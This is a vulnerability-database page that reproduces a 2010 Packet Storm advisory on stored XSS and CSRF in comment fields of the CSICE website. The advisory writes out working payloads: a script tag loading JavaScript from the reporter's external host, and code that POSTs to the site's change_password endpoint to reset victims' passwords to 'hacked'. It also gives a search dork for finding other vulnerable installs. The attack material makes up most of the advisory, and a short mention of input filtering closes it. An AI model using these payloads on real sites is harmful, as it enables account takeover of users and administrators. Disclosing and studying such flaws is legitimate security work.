Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CSICE Cross Site Request Forgery / Cross Site Scripting

🗓️ 16 Mar 2010 00:00:00Reported by FB1H2SType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

CSICE website vulnerable to XSS and CSRF attack

Code
`http://www.csice.org/  
Suffers from XSS and CSRF cross site scripting and cross site request  
forgery attacks.  
The vulnerability lies in the Post comment filelds in the following page  
move to this page 'only for authenticated user'  
http://www.csice.org/student/subjects.html  
  
and choose a subject and  
http://www.csice.org/student/LessonPosting/59/0/view_units.html  
  
here users are allowed to post comments there,but the comments r not  
filtered possibly allowing any one to inject scripts too  
  
like we could update a post with a comment like  
<script>alert('Hacked by FB1H2S')</script>  
  
which ill get updated on the DATABASE and the next time when some one  
views the page tht page ill alert with javascript alert statnment.  
  
This attack could be taken to another extend,now tht we could run  
javascripts on client side we may build a java script, which when runs  
ill change the user password to a new value, all we have to do is  
update the code in the comment field and when some other user views  
the page the script for change password ill get executed and ,his or  
her password ill be changed.  
  
Consider for example :  
post comment with this  
<SCRIPT SRC="http://fb1h2s.byethost15.com/sas.js"></SCRIPT>  
  
wht sas.js do is change the user password to 'hacked' when run on the victim,  
  
var pass_req = createAjaxObject();  
var data = 'hacked';  
alert(data);  
pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");  
pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");  
pass_req.send("data="+data);  
  
So using this hack we could hack change any users/administrtors  
password to a new value  
  
I am not able to figure out what CMS this site runs on, but it surel is an open source CMS, see the inurl:ajax_redirect.php?page=  
you could see a lot of results  
  
  
Filtering the input Will be the way to prevent these issues, have a look at  
our website and this paper on how to prevent such attacks  
http://www.whitec0de.com/paper/0121  
  
love FB1H2S  
hcking is matter of time knowldge and patience  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Mar 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
csicexsscsrfvulnerabilitypost commentauthenticated usercomments filteringinjectiondatabasealert statementchange password scriptajax redirectopen sourcecmsinput filteringwebsite securityprevention paperwhitec0dehacking
22